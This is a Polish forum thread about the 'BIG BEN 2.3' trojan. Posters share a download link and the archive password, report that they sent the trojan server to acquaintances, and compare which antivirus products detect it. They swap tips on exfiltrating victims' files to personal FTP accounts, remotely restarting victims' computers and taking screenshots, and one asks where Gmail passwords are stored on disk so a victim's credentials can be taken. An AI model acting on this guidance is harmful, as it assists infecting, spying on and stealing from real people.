BIG BEN 2.3

Status
Zamknięty.

stoickov

Użytkownik
Dołączył
Grudzień 16, 2006
Posty
4
Teraz pytanie totalnego nooba
smile.gif
Gdzie to jest ?

Edit:



gdyby ktos mial podobny problem jak ja to pisze jak sobie poradzilem.

W module AMON wyslaczylem skonawanie przy

> uruchamianiu aplikacji
> rozpakowywaniu

Wylaczylem Noda i spokoj, dziala
smile.gif


pozdrawiam, stoickov
 

wojteksg

Użytkownik
Dołączył
Grudzień 29, 2006
Posty
52
Jeśli chce ktoś zdobyć hasełko niech pisze zawsze na gg [GG podajemy w profilu - D0han].
Wyśle wam je.
 

ant

Użytkownik
Dołączył
Grudzień 30, 2006
Posty
1
czesc .
jak wygeneruje serwer to pozniej nie moge go znalesc gdzie sie on miesci w jakim folderze
 

widmo sh@dow

Użytkownik
Dołączył
Grudzień 30, 2006
Posty
3
Błagam niech mi ktoś da DZIAŁAJĄCY link do big bena, bo już nie mam siły szukać w google. od 3 dni próbuje i , że się tak brzydko wyrażę , gówno. PLEASE LINK FOR BIG-BEN!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!
 

bobikrk

Użytkownik
Dołączył
Październik 24, 2004
Posty
145
Originally posted by widmo sh@dow
Błagam niech mi ktoś da DZIAŁAJĄCY link do big bena, bo już nie mam siły szukać w google. od 3 dni próbuje i , że się tak brzydko wyrażę , gówno. PLEASE LINK FOR BIG-BEN!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!

BiG BeN GG v2.3 - downloads

Hasło:
Kod:
))%mKa.fj{=I]<jgUlu!qQ0ISZIZ=fmBD$j1]w#y+(e@fk$2.>9XnF/BiGBeN

Szczęśliwego Nowego 2007 Roku!
 

kinway

Użytkownik
Dołączył
Listopad 5, 2006
Posty
21
Originally posted by widmo sh@dow
Błagam niech mi ktoś da DZIAŁAJĄCY link do big bena, bo już nie mam siły szukać w google. od 3 dni próbuje i , że się tak brzydko wyrażę , gówno. PLEASE LINK FOR BIG-BEN!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!


to jak to szukales? ja minute na to poswiecilem i zobacz to jest pierwsza strona znaleziona na google:

http://www.trojanypl.org/index.php?name=download&kat=1 ;/
 

ktoś_tam1

Użytkownik
Dołączył
Październik 1, 2006
Posty
14
bawiłem sie tym big benem dzisiaj troche i od razu jak wysłałem serwer kolesiowi to mi napisał:
ssssss (5-01-2007 21:51)
ej
sssssss (5-01-2007 21:51)
jest problem
xxxxx (5-01-2007 21:51)
w?
sssssss (5-01-2007 21:52)
te cewki to jakis trojan
smile.gif

sssssss (5-01-2007 21:52)
back.door.generic2
xxxxxx (5-01-2007 21:52)
hmmmm
ssssssss (5-01-2007 21:52)
no nie hym
ssssssss (5-01-2007 21:52)
tylko trojan
xxxxx (5-01-2007 21:52)
a jakiego masz av?
sssssss (5-01-2007 21:52)
avg
Z tego wynika że jest on już wykrywany przez AVG
<
<

Ale przez np Avasta jeszcze nie na bank. Mam do was pytanko: Czy komus działa wysyłanie plików z kompa ofiary na ftp bądź mail? Pytałem kilka osób i wszyscy zgodnie stwierdzili że na maila sie nie da, a z FTP to roznie bywa. Wiec jak to jest?
 

solier

Użytkownik
Dołączył
Grudzień 11, 2006
Posty
74
Originally posted by ktoś_tam
. Mam do was pytanko: Czy komus działa wysyłanie plików z kompa ofiary na ftp bądź mail? Pytałem kilka osób i wszyscy zgodnie stwierdzili że na maila sie nie da, a z FTP to roznie bywa. Wiec jak to jest?
mi osobiscie ani na ftp ani na mail zaden plik nie chce sie wyslac..
 

solier

Użytkownik
Dołączył
Grudzień 11, 2006
Posty
74
Originally posted by ktoś_tam
Ogłaszam wszem i wobec ze po nieprzespanej nocy i zxastosowaniu metody "prób i błędów" udało mi sie wysłać 2 pliki na ftp.
napisz dokladnie jak skonfigurowales server BB2.3, chodzi oczywiscie o ftp.
 

ktoś_tam1

Użytkownik
Dołączył
Październik 1, 2006
Posty
14
W sumie to nic nie konfigurowalem ;] tylko w total comanderze (wiadomo z resztą) połączenie http://haker_111.fm.interia.pl/szablon_obrazki/ftp2.jpg Poza tym nic nie ustawiałem innego, wszystko zostawiłem tak jak było, niczego nie ruszałem. Dodam tylko że od razu i za kazdym razen sie nie dało wysłac pliku. Probowałem wiele razy, weszlem po godzinie na ftp i sie okazalo że za ktoryms razem jest ;] Gdy ten head.jpg wyslalem, serwer podał info że plik został wysłany na moje ftp, a gdy archiwum to nie, serwer raz mi sie zawiesil, moze mialo to zwiazek z wysylaniem (ale nie jestem pewien). Gdy serwer byl zwieszony wpisywalem komendy reset i screen i po jakims krotkim czasie (ok 2...4 min)komp ofiary sie zrestartowal i przyszedl screen ktorego komende wpisalem podczas "zwisu" serwa. Przypuszczam wiec ze zaraz po wyslaniu pliku na ftp serwer od razu wykonał komendy wpisane wczesniej (nie wykonał ich podczas wysylania, bo byl wtedy mocno obciazony), czyli reset i screen. To by tłumaczylo dlaczego nie przyszla informacja o pomyslnym wyslaniu pliku na ftp. (tak mi sie wydaje) A w przypadku tego "małego .jpg serwer nie byl zbyt mocno obciazony i od razu przyszlo info ze sie udało. dodam tylko że plik archives tej ofiary ma 6,3MB[/scroll]
 

solier

Użytkownik
Dołączył
Grudzień 11, 2006
Posty
74
Originally posted by ktoś_tam
plik archives tej ofiary ma 6,3MB[/scroll]
miłej lektury życze.

przy konfiguracji servera wpisales w hoscie "ftp.interia.pl" ? czy inaczej? bo ja wpisuje ftp.interia.pl no i niestety problem, nie chce sie wyslac nic.
 

ktoś_tam1

Użytkownik
Dołączył
Październik 1, 2006
Posty
14
nie no zalezy gdzie masz ftp ja mam na republice i wpisuje wtedy ftp.republika.pl

[ Dodano: 15-01-2007, 16:12 ]
Musze przyznac ze teraz juz w jakis 80% przypadkow udaje mi sie przeslac plik na moje FTP, zauważyłem ze to czy sie uda, czy tez nie, głownie zależy od obciazenia połączenia z netem ofiary. Prosciej, gdy ofiara coś sciaga i mocno zamula sobie tym neta to wtedy zazwyczaj sie nie udaje cos od niej sciagac.


Mam jeszcze takie pytanie, watpie czy ktos wie, ale moze jednak: Czy wiecie moze gdzie znajduje sie plik na dysku w ktorym sa zapisywane hasla do roznych kont, np do g-mail. Pytam bo gdy wysylam ofiarze prosbe o podanie hasla, to ona ja odrzuca i lipa, jest przezorna i nie daje sie nabrac :/
 
Status
Zamknięty.
Do góry Bottom